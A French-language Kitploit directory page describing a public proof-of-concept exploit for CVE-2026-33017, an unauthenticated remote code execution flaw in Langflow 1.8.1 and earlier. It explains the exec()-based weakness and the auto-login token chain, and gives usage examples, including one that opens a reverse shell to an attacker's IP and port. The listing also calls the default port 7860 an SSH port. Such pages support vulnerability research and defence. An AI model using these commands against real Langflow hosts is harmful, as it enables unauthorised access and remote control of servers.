Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-33017-Langflow-RCE-PoC — La vulnérabilité dans Langflow 1.8.1 et versions antérieures permet à un attaquant distant non authentifié d'exécuter des commandes arbitraires sur l'hôte. | Kitploit
Outils/GitHubGitHub/omer-efe-curkus/cve-2026-33017-langflow-rce-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubomer-efe-curkus/cve-2026-33017-langflow-rce-poc

CVE-2026-33017-Langflow-RCE-PoC

La vulnérabilité dans Langflow 1.8.1 et versions antérieures permet à un attaquant distant non authentifié d'exécuter des commandes arbitraires sur l'hôte.

Voir le dépôt
1il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-33017-Langflow-RCE-PoC

La vulnérabilité dans Langflow 1.8.1 et versions antérieures permet à un attaquant distant non authentifié d'exécuter des commandes arbitraires sur l'hôte.

Description

Le point de terminaison POST /api/v1/build_public_tmp/{flow_id}/flow permet à quiconque de construire des flux publics sans authentification.

En fournissant le paramètre de données optionnel, un attaquant peut remplacer le flux stocké par sa propre définition personnalisée, en intégrant du code Python arbitraire dans les configurations de nœuds. Ce code contrôlé par l'utilisateur est exécuté via exec() sans sandbox ni validation, conduisant à une exécution de code à distance non authentifiée.

Versions affectées

root@kitploit:~
Langflow 1.8.1 et versions antérieures

Fonctionnalités

  • Création d'un flux public si AUTO_LOGIN=true
  • Exécution de l'exploit : exécute des commandes arbitraires.
  • Shell inversé : initie un shell inversé basé sur bash.

Prérequis

  • L'instance Langflow cible possède au moins un flux public (courant dans les démos, chatbots ou workflows partagés)
  • L'UUID d'un flux public (peut être obtenu à partir de liens/URL partagés)
  • Aucune authentification requise

Lorsque AUTO_LOGIN=true (configuration par défaut), un attaquant non authentifié peut satisfaire toutes les conditions :

  • GET /api/v1/auto_login → obtenir un jeton superutilisateur
  • POST /api/v1/flows/ → créer un flux public
  • Déclencher l'exploit via build_public_tmp sans aucune authentification

Utilisation

root@kitploit:~
python cve-2026-33017.py <host> [options]

Options :

root@kitploit:~
-p PORT, --port PORT : port SSH (défaut : 7860)

-id FLOW_ID, --flow_id FLOW_ID : ID du flux public (un nouveau sera créé s'il est omis)

-c COMMAND, --command COMMAND : commande personnalisée à exécuter

--shell : lance un shell inversé

--lhost LHOST : IP de l'attaquant pour le shell inversé

--lport LPORT : port de l'attaquant pour le shell inversé (défaut : 4444)

-t TIMEOUT, --timeout TIMEOUT : délai d'expiration de la connexion en secondes (défaut : 5)

Exemples :

Exécuter une commande :

root@kitploit:~
python cve-2026-33017.py 127.0.0.1 -c 'touch /tmp/pwned.txt'

Initier un shell inversé :

root@kitploit:~
python cve-2026-33017 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Références

Avis GitHub

NVD CVE-2026-33017

Medium

⚠️ Avertissement

Ce PoC est destiné uniquement à des fins éducatives et de recherche. Utilisez-le à vos propres risques. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé.

Télécharger l’outil